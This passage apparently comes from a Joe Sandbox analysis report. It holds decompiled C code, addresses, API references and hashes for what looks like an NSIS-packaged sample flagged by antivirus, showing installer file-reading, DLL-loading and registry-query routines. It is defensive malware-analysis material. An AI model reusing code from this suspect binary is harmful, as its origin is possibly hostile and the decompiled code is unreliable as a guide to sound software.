                                                                                                                          						_push(0xfffffffe);
                                                                                                                          						L21:
                                                                                                                          						_pop(_t15);
                                                                                                                          						return _t15;
                                                                                                                          					}
                                                                                                                          					 *0x40ce60 =  *0x40ce60 + _t37;
                                                                                                                          					_t49 =  *0x40ce84; // 0x0
                                                                                                                          					if(_t49 != 0) {
                                                                                                                          						goto L6;
                                                                                                                          					}
                                                                                                                          					goto L16;
                                                                                                                          					L20:
                                                                                                                          					_push(0xfffffffd);
                                                                                                                          					goto L21;
                                                                                                                          				}
                                                                                                                          				return _t12 | 0xffffffff;
                                                                                                                          			}

















                                                                                                                          0x0040347c
                                                                                                                          0x00403489
                                                                                                                          0x0040349c
                                                                                                                          0x004034a1
                                                                                                                          0x004035d1
                                                                                                                          0x004035d3
                                                                                                                          0x00000000
                                                                                                                          0x004035d9
                                                                                                                          0x004034ad
                                                                                                                          0x004034c0
                                                                                                                          0x004034c6
                                                                                                                          0x004034cc
                                                                                                                          0x004034d7
                                                                                                                          0x004034d7
                                                                                                                          0x004034dc
                                                                                                                          0x004034e1
                                                                                                                          0x004034e9
                                                                                                                          0x004034eb
                                                                                                                          0x004034eb
                                                                                                                          0x004034f4
                                                                                                                          0x004034fb
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00403501
                                                                                                                          0x00403507
                                                                                                                          0x0040350d
                                                                                                                          0x00000000
                                                                                                                          0x00403513
                                                                                                                          0x00403519
                                                                                                                          0x00403523
                                                                                                                          0x00403539
                                                                                                                          0x0040353e
                                                                                                                          0x00403543
                                                                                                                          0x00403549
                                                                                                                          0x0040354f
                                                                                                                          0x00403559
                                                                                                                          0x00403560
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00403562
                                                                                                                          0x00403568
                                                                                                                          0x0040356a
                                                                                                                          0x0040358d
                                                                                                                          0x00403593
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00403595
                                                                                                                          0x00403597
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00403599
                                                                                                                          0x00403599
                                                                                                                          0x004035ac
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x004035bb
                                                                                                                          0x00000000
                                                                                                                          0x004035bb
                                                                                                                          0x00403574
                                                                                                                          0x0040357b
                                                                                                                          0x004035c8
                                                                                                                          0x004035ce
                                                                                                                          0x004035ce
                                                                                                                          0x00000000
                                                                                                                          0x004035ce
                                                                                                                          0x0040357d
                                                                                                                          0x00403583
                                                                                                                          0x00403589
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x004035cc
                                                                                                                          0x004035cc
                                                                                                                          0x00000000
                                                                                                                          0x004035cc
                                                                                                                          0x00000000

                                                                                                                          APIs
                                                                                                                          • GetTickCount.KERNEL32 ref: 0040348D
                                                                                                                            • Part of subcall function 004035F8: SetFilePointer.KERNELBASE(00000000,00000000,00000000,004032F6,?), ref: 00403606
                                                                                                                          • SetFilePointer.KERNELBASE(00000000,00000000,?,00000000,004033A3,00000004,00000000,00000000,?,?,0040331D,000000FF,00000000,00000000,?,?), ref: 004034C0
                                                                                                                          • SetFilePointer.KERNELBASE(000052B8,00000000,00000000,00414EF0,00004000,?,00000000,004033A3,00000004,00000000,00000000,?,?,0040331D,000000FF,00000000), ref: 004035BB
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.33051309738.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000001.00000002.33051278337.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051370538.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051404339.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051528806.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051549373.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051594740.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051637884.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: FilePointer$CountTick
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1092082344-0
                                                                                                                          • Opcode ID: 3ac154d52ea9800dffc85ef1316eb03f3be91f57b238af8bcd161a90f23d8065
                                                                                                                          • Instruction ID: 4a0f782daef8a724a5dada35133bb9654e3c612a62d69fcdf17392b9264be50a
                                                                                                                          • Opcode Fuzzy Hash: 3ac154d52ea9800dffc85ef1316eb03f3be91f57b238af8bcd161a90f23d8065
                                                                                                                          • Instruction Fuzzy Hash: 3A31AEB2650205EFC7209F29EE848263BADF70475A755023BE900B22F1C7B59D42DB9D
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 60%
                                                                                                                          			E004020D8(void* __ebx, void* __eflags) {
                                                                                                                          				struct HINSTANCE__* _t23;
                                                                                                                          				struct HINSTANCE__* _t31;
                                                                                                                          				void* _t32;
                                                                                                                          				WCHAR* _t35;
                                                                                                                          				intOrPtr* _t36;
                                                                                                                          				void* _t37;
                                                                                                                          				void* _t39;
                                                                                                                          
                                                                                                                          				_t32 = __ebx;
                                                                                                                          				asm("sbb eax, 0x42a320");
                                                                                                                          				 *(_t39 - 4) = 1;
                                                                                                                          				if(__eflags < 0) {
                                                                                                                          					_push(0xffffffe7);
                                                                                                                          					L15:
                                                                                                                          					E00401423();
                                                                                                                          					L16:
                                                                                                                          					 *0x42a2e8 =  *0x42a2e8 +  *(_t39 - 4);
                                                                                                                          					return 0;
                                                                                                                          				}
                                                                                                                          				_t35 = E00402DA6(0xfffffff0);
                                                                                                                          				 *((intOrPtr*)(_t39 - 0x44)) = E00402DA6(1);
                                                                                                                          				if( *((intOrPtr*)(_t39 - 0x20)) == __ebx) {
                                                                                                                          					L3:
                                                                                                                          					_t23 = LoadLibraryExW(_t35, _t32, 8); // executed
                                                                                                                          					_t47 = _t23 - _t32;
                                                                                                                          					 *(_t39 + 8) = _t23;
                                                                                                                          					if(_t23 == _t32) {
                                                                                                                          						_push(0xfffffff6);
                                                                                                                          						goto L15;
                                                                                                                          					}
                                                                                                                          					L4:
                                                                                                                          					_t36 = E00406AA4(_t47,  *(_t39 + 8),  *((intOrPtr*)(_t39 - 0x44)));
                                                                                                                          					if(_t36 == _t32) {
                                                                                                                          						E004056CA(0xfffffff7,  *((intOrPtr*)(_t39 - 0x44)));
                                                                                                                          					} else {
                                                                                                                          						 *(_t39 - 4) = _t32;
                                                                                                                          						if( *((intOrPtr*)(_t39 - 0x28)) == _t32) {
                                                                                                                          							 *_t36( *((intOrPtr*)(_t39 - 8)), 0x400, _t37, 0x40ce58, 0x40a000); // executed
                                                                                                                          						} else {
                                                                                                                          							E00401423( *((intOrPtr*)(_t39 - 0x28)));
                                                                                                                          							if( *_t36() != 0) {
                                                                                                                          								 *(_t39 - 4) = 1;
                                                                                                                          							}
                                                                                                                          						}
                                                                                                                          					}
                                                                                                                          					if( *((intOrPtr*)(_t39 - 0x24)) == _t32 && E00403CB7( *(_t39 + 8)) != 0) {
                                                                                                                          						FreeLibrary( *(_t39 + 8));
                                                                                                                          					}
                                                                                                                          					goto L16;
                                                                                                                          				}
                                                                                                                          				_t31 = GetModuleHandleW(_t35); // executed
                                                                                                                          				 *(_t39 + 8) = _t31;
                                                                                                                          				if(_t31 != __ebx) {
                                                                                                                          					goto L4;
                                                                                                                          				}
                                                                                                                          				goto L3;
                                                                                                                          			}










                                                                                                                          0x004020d8
                                                                                                                          0x004020d8
                                                                                                                          0x004020dd
                                                                                                                          0x004020e4
                                                                                                                          0x004021a3
                                                                                                                          0x004022f1
                                                                                                                          0x004022f1
                                                                                                                          0x00402c2a
                                                                                                                          0x00402c2d
                                                                                                                          0x00402c39
                                                                                                                          0x00402c39
                                                                                                                          0x004020f3
                                                                                                                          0x004020fd
                                                                                                                          0x00402100
                                                                                                                          0x00402110
                                                                                                                          0x00402114
                                                                                                                          0x0040211a
                                                                                                                          0x0040211c
                                                                                                                          0x0040211f
                                                                                                                          0x0040219c
                                                                                                                          0x00000000
                                                                                                                          0x0040219c
                                                                                                                          0x00402121
                                                                                                                          0x0040212c
                                                                                                                          0x00402130
                                                                                                                          0x00402170
                                                                                                                          0x00402132
                                                                                                                          0x00402135
                                                                                                                          0x00402138
                                                                                                                          0x00402164
                                                                                                                          0x0040213a
                                                                                                                          0x0040213d
                                                                                                                          0x00402146
                                                                                                                          0x00402148
                                                                                                                          0x00402148
                                                                                                                          0x00402146
                                                                                                                          0x00402138
                                                                                                                          0x00402178
                                                                                                                          0x00402191
                                                                                                                          0x00402191
                                                                                                                          0x00000000
                                                                                                                          0x00402178
                                                                                                                          0x00402103
                                                                                                                          0x0040210b
                                                                                                                          0x0040210e
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000

                                                                                                                          APIs
                                                                                                                          • GetModuleHandleW.KERNELBASE(00000000,00000001,000000F0), ref: 00402103
                                                                                                                            • Part of subcall function 004056CA: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsxD40A.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000,?), ref: 00405702
                                                                                                                            • Part of subcall function 004056CA: lstrlenW.KERNEL32(004030A8,Skipped: C:\Users\user\AppData\Local\Temp\nsxD40A.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000), ref: 00405712
                                                                                                                            • Part of subcall function 004056CA: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsxD40A.tmp\System.dll,004030A8), ref: 00405725
                                                                                                                            • Part of subcall function 004056CA: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsxD40A.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsxD40A.tmp\System.dll), ref: 00405737
                                                                                                                            • Part of subcall function 004056CA: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040575D
                                                                                                                            • Part of subcall function 004056CA: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405777
                                                                                                                            • Part of subcall function 004056CA: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405785
                                                                                                                          • LoadLibraryExW.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 00402114
                                                                                                                          • FreeLibrary.KERNEL32(?,?,000000F7,?,?,00000008,00000001,000000F0), ref: 00402191
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.33051309738.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000001.00000002.33051278337.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051370538.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051404339.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051528806.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051549373.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051594740.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051637884.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 334405425-0
                                                                                                                          • Opcode ID: 4e1576ccb2c8f02a5f08501fac0f0b08983aba2fe72a15ca7d6fcdcd0b58f005
                                                                                                                          • Instruction ID: 1e7e134340f86907485d462c64894228b35b3344cd4f3d252167f9901203d809
                                                                                                                          • Opcode Fuzzy Hash: 4e1576ccb2c8f02a5f08501fac0f0b08983aba2fe72a15ca7d6fcdcd0b58f005
                                                                                                                          • Instruction Fuzzy Hash: C521C231904104FADF11AFA5CF48A9D7A70BF48354F60413BF605B91E0DBBD8A929A5D
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 86%
                                                                                                                          			E0040259E(int* __ebx, intOrPtr __edx, short* __edi) {
                                                                                                                          				int _t10;
                                                                                                                          				long _t13;
                                                                                                                          				int* _t16;
                                                                                                                          				intOrPtr _t21;
                                                                                                                          				short* _t22;
                                                                                                                          				void* _t24;
                                                                                                                          				void* _t26;
                                                                                                                          				void* _t29;
                                                                                                                          
                                                                                                                          				_t22 = __edi;
                                                                                                                          				_t21 = __edx;
                                                                                                                          				_t16 = __ebx;
                                                                                                                          				_t24 = E00402DE6(_t29, 0x20019);
                                                                                                                          				_t10 = E00402D84(3);
                                                                                                                          				 *((intOrPtr*)(_t26 - 0x10)) = _t21;
                                                                                                                          				 *__edi = __ebx;
                                                                                                                          				if(_t24 == __ebx) {
                                                                                                                          					 *((intOrPtr*)(_t26 - 4)) = 1;
                                                                                                                          				} else {
                                                                                                                          					 *(_t26 + 8) = 0x3ff;
                                                                                                                          					if( *((intOrPtr*)(_t26 - 0x20)) == __ebx) {
                                                                                                                          						_t13 = RegEnumValueW(_t24, _t10, __edi, _t26 + 8, __ebx, __ebx, __ebx, __ebx);
                                                                                                                          						__eflags = _t13;
                                                                                                                          						if(_t13 != 0) {
                                                                                                                          							 *((intOrPtr*)(_t26 - 4)) = 1;
                                                                                                                          						}
                                                                                                                          					} else {
                                                                                                                          						RegEnumKeyW(_t24, _t10, __edi, 0x3ff);
                                                                                                                          					}
                                                                                                                          					_t22[0x3ff] = _t16;
                                                                                                                          					_push(_t24); // executed
                                                                                                                          					RegCloseKey(); // executed
                                                                                                                          				}
                                                                                                                          				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t26 - 4));
                                                                                                                          				return 0;
                                                                                                                          			}











                                                                                                                          0x0040259e
                                                                                                                          0x0040259e
                                                                                                                          0x0040259e
                                                                                                                          0x004025aa
                                                                                                                          0x004025ac
                                                                                                                          0x004025b4
                                                                                                                          0x004025b7
                                                                                                                          0x004025ba
                                                                                                                          0x0040292e
                                                                                                                          0x004025c0
                                                                                                                          0x004025c8
                                                                                                                          0x004025cb
                                                                                                                          0x004025e4
                                                                                                                          0x004025ea
                                                                                                                          0x004025ec
                                                                                                                          0x004025ee
                                                                                                                          0x004025ee
                                                                                                                          0x004025cd
                                                                                                                          0x004025d1
                                                                                                                          0x004025d1
                                                                                                                          0x004025f5
                                                                                                                          0x004025fc
                                                                                                                          0x004025fd
                                                                                                                          0x004025fd
                                                                                                                          0x00402c2d
                                                                                                                          0x00402c39

                                                                                                                          APIs
                                                                                                                          • RegEnumKeyW.ADVAPI32(00000000,00000000,?,000003FF), ref: 004025D1
                                                                                                                          • RegEnumValueW.ADVAPI32(00000000,00000000,?,?), ref: 004025E4
                                                                                                                          • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsxD40A.tmp,00000000,00000011,00000002), ref: 004025FD
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.33051309738.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000001.00000002.33051278337.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051370538.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051404339.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051528806.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051549373.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051594740.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051637884.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Enum$CloseValue
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 397863658-0
                                                                                                                          • Opcode ID: 4d5d6de253f2bfd7cf506576e69ec75748f25e1160f40c25ddf4f829a7692b41
                                                                                                                          • Instruction ID: fdd171a53236be04b49e80cc8c25aaf428e2db1c32e81cf7e645575326a8d696
                                                                                                                          • Opcode Fuzzy Hash: 4d5d6de253f2bfd7cf506576e69ec75748f25e1160f40c25ddf4f829a7692b41
                                                                                                                          • Instruction Fuzzy Hash: 35017CB1A04105ABEB159F94DE58AAEB66CEF40348F10403AF501B61D0EBB85E45966D
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 92%
                                                                                                                          			E00403371(void* __ecx, long _a4, intOrPtr _a8, void* _a12, long _a16) {
                                                                                                                          				long _v8;
                                                                                                                          				long _t21;
                                                                                                                          				long _t22;
                                                                                                                          				void* _t24;
                                                                                                                          				long _t26;
                                                                                                                          				int _t27;
                                                                                                                          				long _t28;
                                                                                                                          				void* _t29;
                                                                                                                          				void* _t30;
                                                                                                                          				long _t31;
                                                                                                                          				long _t32;
                                                                                                                          				long _t36;
                                                                                                                          
                                                                                                                          				_t21 = _a4;
                                                                                                                          				if(_t21 >= 0) {
                                                                                                                          					_t32 = _t21 +  *0x42a2b8;
                                                                                                                          					 *0x420ef4 = _t32;
                                                                                                                          					SetFilePointer( *0x40a01c, _t32, 0, 0); // executed
                                                                                                                          				}
                                                                                                                          				_t22 = E00403479(4);
                                                                                                                          				if(_t22 >= 0) {
                                                                                                                          					_t24 = E004061DB( *0x40a01c,  &_a4, 4); // executed
                                                                                                                          					if(_t24 == 0) {
                                                                                                                          						L18:
                                                                                                                          						_push(0xfffffffd);
                                                                                                                          						goto L19;
                                                                                                                          					} else {
                                                                                                                          						 *0x420ef4 =  *0x420ef4 + 4;
                                                                                                                          						_t36 = E00403479(_a4);
                                                                                                                          						if(_t36 < 0) {
                                                                                                                          							L21:
                                                                                                                          							_t22 = _t36;
                                                                                                                          						} else {
                                                                                                                          							if(_a12 != 0) {
                                                                                                                          								_t26 = _a4;
                                                                                                                          								if(_t26 >= _a16) {
                                                                                                                          									_t26 = _a16;
                                                                                                                          								}
                                                                                                                          								_t27 = ReadFile( *0x40a01c, _a12, _t26,  &_v8, 0); // executed
                                                                                                                          								if(_t27 != 0) {
                                                                                                                          									_t36 = _v8;
                                                                                                                          									 *0x420ef4 =  *0x420ef4 + _t36;
                                                                                                                          									goto L21;
                                                                                                                          								} else {
                                                                                                                          									goto L18;
                                                                                                                          								}
                                                                                                                          							} else {
                                                                                                                          								if(_a4 <= 0) {
                                                                                                                          									goto L21;
                                                                                                                          								} else {
                                                                                                                          									while(1) {
                                                                                                                          										_t28 = _a4;
                                                                                                                          										if(_a4 >= 0x4000) {
                                                                                                                          											_t28 = 0x4000;
                                                                                                                          										}
                                                                                                                          										_v8 = _t28;
                                                                                                                          										_t29 = E004061DB( *0x40a01c, 0x414ef0, _t28); // executed
                                                                                                                          										if(_t29 == 0) {
                                                                                                                          											goto L18;
                                                                                                                          										}
                                                                                                                          										_t30 = E0040620A(_a8, 0x414ef0, _v8); // executed
                                                                                                                          										if(_t30 == 0) {
                                                                                                                          											_push(0xfffffffe);
                                                                                                                          											L19:
                                                                                                                          											_pop(_t22);
                                                                                                                          										} else {
                                                                                                                          											_t31 = _v8;
                                                                                                                          											_a4 = _a4 - _t31;
                                                                                                                          											 *0x420ef4 =  *0x420ef4 + _t31;
                                                                                                                          											_t36 = _t36 + _t31;
                                                                                                                          											if(_a4 > 0) {
                                                                                                                          												continue;
                                                                                                                          											} else {
                                                                                                                          												goto L21;
                                                                                                                          											}
                                                                                                                          										}
                                                                                                                          										goto L22;
                                                                                                                          									}
                                                                                                                          									goto L18;
                                                                                                                          								}
                                                                                                                          							}
                                                                                                                          						}
                                                                                                                          					}
                                                                                                                          				}
                                                                                                                          				L22:
                                                                                                                          				return _t22;
                                                                                                                          			}















                                                                                                                          0x00403375
                                                                                                                          0x0040337e
                                                                                                                          0x00403387
                                                                                                                          0x0040338b
                                                                                                                          0x00403396
                                                                                                                          0x00403396
                                                                                                                          0x0040339e
                                                                                                                          0x004033a5
                                                                                                                          0x004033b7
                                                                                                                          0x004033be
                                                                                                                          0x00403463
                                                                                                                          0x00403463
                                                                                                                          0x00000000
                                                                                                                          0x004033c4
                                                                                                                          0x004033c7
                                                                                                                          0x004033d3
                                                                                                                          0x004033d7
                                                                                                                          0x00403471
                                                                                                                          0x00403471
                                                                                                                          0x004033dd
                                                                                                                          0x004033e0
                                                                                                                          0x0040343f
                                                                                                                          0x00403445
                                                                                                                          0x00403447
                                                                                                                          0x00403447
                                                                                                                          0x00403459
                                                                                                                          0x00403461
                                                                                                                          0x00403468
                                                                                                                          0x0040346b
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x004033e2
                                                                                                                          0x004033e5
                                                                                                                          0x00000000
                                                                                                                          0x004033eb
                                                                                                                          0x004033f0
                                                                                                                          0x004033f7
                                                                                                                          0x004033fa
                                                                                                                          0x004033fc
                                                                                                                          0x004033fc
                                                                                                                          0x00403409
                                                                                                                          0x0040340c
                                                                                                                          0x00403413
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x0040341c
                                                                                                                          0x00403423
                                                                                                                          0x0040343b
                                                                                                                          0x00403465
                                                                                                                          0x00403465
                                                                                                                          0x00403425
                                                                                                                          0x00403425
                                                                                                                          0x00403428
                                                                                                                          0x0040342b
                                                                                                                          0x00403431
                                                                                                                          0x00403437
                                                                                                                          0x00000000
                                                                                                                          0x00403439
                                                                                                                          0x00000000
                                                                                                                          0x00403439
                                                                                                                          0x00403437
                                                                                                                          0x00000000
                                                                                                                          0x00403423
                                                                                                                          0x00000000
                                                                                                                          0x004033f0
                                                                                                                          0x004033e5
                                                                                                                          0x004033e0
                                                                                                                          0x004033d7
                                                                                                                          0x004033be
                                                                                                                          0x00403473
                                                                                                                          0x00403476

                                                                                                                          APIs
                                                                                                                          • SetFilePointer.KERNELBASE(?,00000000,00000000,00000000,00000000,?,?,0040331D,000000FF,00000000,00000000,?,?), ref: 00403396
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.33051309738.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000001.00000002.33051278337.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051370538.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051404339.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051528806.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051549373.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051594740.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051637884.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: FilePointer
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 973152223-0
                                                                                                                          • Opcode ID: b1bf35b654f0c361909532a2badc84153f12731a676864620281ad9f652e4f28
                                                                                                                          • Instruction ID: 963a71f16df831595788c30304fa9cedbf2cad19eb63879c1ada4fe15c9ed8fa
                                                                                                                          • Opcode Fuzzy Hash: b1bf35b654f0c361909532a2badc84153f12731a676864620281ad9f652e4f28
                                                                                                                          • Instruction Fuzzy Hash: 93319F70200219EFDB129F65ED84E9A3FA8FF00355B10443AF905EA1A1D778CE51DBA9
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 84%
                                                                                                                          			E0040252A(int* __ebx, char* __edi) {
                                                                                                                          				short* _t18;
                                                                                                                          				void* _t35;
                                                                                                                          				void* _t37;
                                                                                                                          				void* _t40;
                                                                                                                          
                                                                                                                          				_t33 = __edi;
                                                                                                                          				_t27 = __ebx;
                                                                                                                          				_t35 = E00402DE6(_t40, 0x20019);
                                                                                                                          				_t18 = E00402DA6(0x33);
                                                                                                                          				 *__edi = __ebx;
                                                                                                                          				if(_t35 == __ebx) {
                                                                                                                          					 *(_t37 - 4) = 1;
                                                                                                                          				} else {
                                                                                                                          					 *(_t37 - 0x10) = 0x800;
                                                                                                                          					if(RegQueryValueExW(_t35, _t18, __ebx, _t37 + 8, __edi, _t37 - 0x10) != 0) {
                                                                                                                          						L7:
                                                                                                                          						 *_t33 = _t27;
                                                                                                                          						 *(_t37 - 4) = 1;
                                                                                                                          					} else {
                                                                                                                          						if( *(_t37 + 8) == 4) {
                                                                                                                          							__eflags =  *(_t37 - 0x20) - __ebx;
                                                                                                                          							 *(_t37 - 4) = 0 |  *(_t37 - 0x20) == __ebx;
                                                                                                                          							E004065AF(__edi,  *__edi);
                                                                                                                          						} else {
                                                                                                                          							if( *(_t37 + 8) == 1 ||  *(_t37 + 8) == 2) {
                                                                                                                          								 *(_t37 - 4) =  *(_t37 - 0x20);
                                                                                                                          								_t33[0x7fe] = _t27;
                                                                                                                          							} else {
                                                                                                                          								goto L7;
                                                                                                                          							}
                                                                                                                          						}
                                                                                                                          					}
                                                                                                                          					_push(_t35); // executed
                                                                                                                          					RegCloseKey(); // executed
                                                                                                                          				}
                                                                                                                          				 *0x42a2e8 =  *0x42a2e8 +  *(_t37 - 4);
                                                                                                                          				return 0;
                                                                                                                          			}







                                                                                                                          0x0040252a
                                                                                                                          0x0040252a
                                                                                                                          0x00402536
                                                                                                                          0x00402538
                                                                                                                          0x0040253f
                                                                                                                          0x00402542
                                                                                                                          0x0040292e
                                                                                                                          0x00402548
                                                                                                                          0x0040254b
                                                                                                                          0x00402566
                                                                                                                          0x00402596
                                                                                                                          0x00402596
                                                                                                                          0x00402599
                                                                                                                          0x00402568
                                                                                                                          0x0040256c
                                                                                                                          0x00402585
                                                                                                                          0x0040258c
                                                                                                                          0x0040258f
                                                                                                                          0x0040256e
                                                                                                                          0x00402571
                                                                                                                          0x0040257c
                                                                                                                          0x004025f5
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00402571
                                                                                                                          0x0040256c
                                                                                                                          0x004025fc
                                                                                                                          0x004025fd
                                                                                                                          0x004025fd
                                                                                                                          0x00402c2d
                                                                                                                          0x00402c39

                                                                                                                          APIs
                                                                                                                          • RegQueryValueExW.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,?,00000033), ref: 0040255B
                                                                                                                          • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsxD40A.tmp,00000000,00000011,00000002), ref: 004025FD
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.33051309738.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000001.00000002.33051278337.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051370538.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051404339.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051528806.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051549373.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051594740.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051637884.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: CloseQueryValue
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3356406503-0
                                                                                                                          • Opcode ID: bb5f277bdcdb4f4d7ed011efb7f12b3f761cea10e612e21437796c278d597c2a
                                                                                                                          • Instruction ID: eaee0c709954dca67eb2d1c59e66f6ca2c08a593dad46a4828cc6951ae7b5872
                                                                                                                          • Opcode Fuzzy Hash: bb5f277bdcdb4f4d7ed011efb7f12b3f761cea10e612e21437796c278d597c2a
